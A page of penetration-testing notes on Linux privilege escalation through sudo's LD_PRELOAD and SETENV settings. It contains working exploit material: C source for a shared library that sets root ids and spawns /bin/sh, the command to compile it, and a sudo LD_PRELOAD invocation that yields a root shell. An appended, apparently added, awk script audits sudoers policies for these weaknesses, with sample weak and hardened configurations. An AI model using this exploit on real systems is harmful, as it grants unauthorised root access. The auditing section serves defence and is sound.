# LD\_Preload / SETENV

There are a couple of different ways I have found this to work:

1\. In the image below, if you see the marked area when running sudo -l, then you should be good to go.

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FEt0CUHF411VBvsA1sj46%2Fimage.png?alt=media&#x26;token=6cf56fa4-aac5-42ce-a3b9-abfa3a2034a4" alt=""><figcaption></figcaption></figure>

2\. If you run sudo -l and see SETENV under sudo permissions then I would also try this. Note: I had a file path after SETENV when this worked. I have not tried it with a bin, so I can't verify if it works the same.

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FgCDBm4SYbkFxmpvhtk9U%2Fimage.png?alt=media&#x26;token=9f0c7d65-acad-4134-a729-8d5c7ad67590" alt=""><figcaption></figcaption></figure>

1. On the attacker machine, create a file called shell.c with the following code.

```c
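#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setuid, setgid */

/* _init runs when the dynamic loader maps this library into the process. */
void _init(void) {
        unsetenv("LD_PRELOAD");   /* keep child processes from reloading this library */
        setgid(0);
        setuid(0);
        system("/bin/sh");
}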
```

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2F5gJWs6gcypaBRYCj9wNe%2Fimage.png?alt=media&#x26;token=1d6ceb16-2289-4bb8-a3ea-c0c95b8df07a" alt=""><figcaption></figcaption></figure>

2\. Build the shell.c code into shell.so

```bash
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
```

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FQi946Q04Slj1hi1n9LPa%2Fimage.png?alt=media&#x26;token=c1ad07fb-e58e-4e81-a7dc-b91b2d86bc12" alt=""><figcaption></figcaption></figure>

3\. Transfer the shell.so file to the target machine.

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FuOo5VHaWIe9CLpsTQSBJ%2Fimage.png?alt=media&#x26;token=9d596848-c692-45fb-9ef7-f0ea715fb1f3" alt=""><figcaption></figcaption></figure>

4\. Run the command below to get a root shell. Replace /usr/bin/ping with the path specified in the output from sudo -l.

```
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
```

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FwlLPpXwcNGZzhO0N6A4G%2Fimage.png?alt=media&#x26;token=f1f5083d-334e-4306-b353-6dd5a43ec860" alt=""><figcaption></figcaption></figure>
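
To find the two conditions from the top of this page on your own hosts, the added example below (not part of the original page) scans sudoers text or `sudo -l` output for `env_keep` entries that preserve loader variables and for `SETENV` tags. The function name and both sample policies are constructed for illustration, and it assumes the marked area in the first screenshot is an `env_keep` entry for `LD_PRELOAD`.

```bash
#!/bin/sh
# Reads sudoers text or `sudo -l` output on stdin and prints one line per
# finding. Added example; function and sample names are constructed.
audit_sudo_env() {
    awk '
    # Skip comments, but keep "#1000"-style uid entries, which are real rules.
    /^[ \t]*#/ && !/^[ \t]*#[0-9]/ { next }
    {
        line = $0
        # env_keep preserves a dynamic-loader variable, so a caller-supplied
        # value survives env_reset and reaches the process started as root.
        if (line ~ /env_keep/ && line ~ /LD_(PRELOAD|LIBRARY_PATH|AUDIT)/)
            printf "HIGH env_keep passes loader variable (line %d): %s\n", NR, $0
        # SETENV tag lets the caller set any variable for that command.
        # Drop NOSETENV first so it is not mistaken for SETENV.
        gsub(/NOSETENV:/, "", line)
        if (line ~ /SETENV:/)
            printf "HIGH SETENV tag on command (line %d): %s\n", NR, $0
        # Same effect for every rule: Defaults setenv that is not negated.
        # (Only visible in sudoers text, where the line starts with Defaults.)
        if ($0 ~ /^[ \t]*Defaults/ && $0 ~ /(^|[^!A-Za-z_])setenv/)
            printf "HIGH Defaults setenv enabled (line %d): %s\n", NR, $0
    }'
}

# Constructed sample policy with both weak settings.
sample_weak() {
    cat <<'EOF'
Defaults env_reset
Defaults env_keep += "LD_PRELOAD"
# Defaults env_keep += "LD_LIBRARY_PATH"
alice ALL=(root) NOPASSWD: /usr/bin/ping
bob ALL=(root) SETENV: NOPASSWD: /opt/scripts/backup.sh
carol ALL=(root) NOSETENV: /usr/bin/less
EOF
}

# Constructed corrected policy: nothing kept, SETENV removed.
sample_hardened() {
    cat <<'EOF'
Defaults env_reset
Defaults !setenv
Defaults env_delete += "LD_PRELOAD LD_LIBRARY_PATH"
alice ALL=(root) NOPASSWD: /usr/bin/ping
bob ALL=(root) NOSETENV: /opt/scripts/backup.sh
EOF
}

sample_weak | audit_sudo_env
```

On a live host, feed it the real policy, for example `sudo -l | audit_sudo_env` for one account or the contents of the sudoers files when run as an administrator.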
